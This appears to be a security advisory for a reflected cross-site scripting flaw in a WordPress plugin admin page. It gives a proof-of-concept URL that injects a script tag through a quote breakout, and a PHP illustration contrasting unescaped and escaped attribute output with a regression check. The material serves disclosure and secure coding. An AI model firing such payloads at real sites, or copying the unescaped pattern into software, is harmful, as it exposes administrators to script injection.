EPSS: 0.001 (Low), percentile 43.5%
The plugin does not escape generated URLs before outputting them in attributes on an admin page, leading to Reflected Cross-Site Scripting.
https://example.com/wp-admin/admin.php?page=hfcm-list&'><script>alert(/XSS/)</script>
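The unescaped-attribute pattern described above next to its hardened form, as an added stand-alone PHP example that is not the plugin's code. The function names are hypothetical, and htmlspecialchars() stands in for WordPress's esc_url() so the script runs outside WordPress.

```php
<?php
// Added illustration; not the plugin's code. All function names are hypothetical.

// Constructed sample: the request URI taken from the proof-of-concept URL on this page.
$request_uri = "/wp-admin/admin.php?page=hfcm-list&'><script>alert(/XSS/)</script>";

// Builds a link back to the current admin page with one extra parameter,
// the way a list screen generates its sort or pagination links.
function build_link(string $request_uri, string $key, string $value): string {
    $sep = (strpos($request_uri, '?') === false) ? '?' : '&';
    return $request_uri . $sep . rawurlencode($key) . '=' . rawurlencode($value);
}

// Vulnerable pattern: the generated URL is placed in a quoted attribute as-is,
// so a quote character in the request URI ends the attribute early.
function render_unescaped(string $url): string {
    return "<a href='" . $url . "'>Next</a>";
}

// Hardened pattern: encode for the HTML attribute context at output time.
// Inside WordPress, the equivalent is passing the URL through esc_url() before echoing.
function render_escaped(string $url): string {
    $safe = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<a href='" . $safe . "'>Next</a>";
}

$url = build_link($request_uri, 'paged', '2');

echo "unescaped: ", render_unescaped($url), PHP_EOL;
echo "escaped:   ", render_escaped($url), PHP_EOL;

// Regression check: the attribute value in the escaped output must not contain
// a raw quote or angle bracket, whatever the request URI held.
$prefix = "<a href='";
$suffix = "'>Next</a>";
$value  = substr(render_escaped($url), strlen($prefix), -strlen($suffix));
var_dump(strpbrk($value, "'\"<>") === false);
```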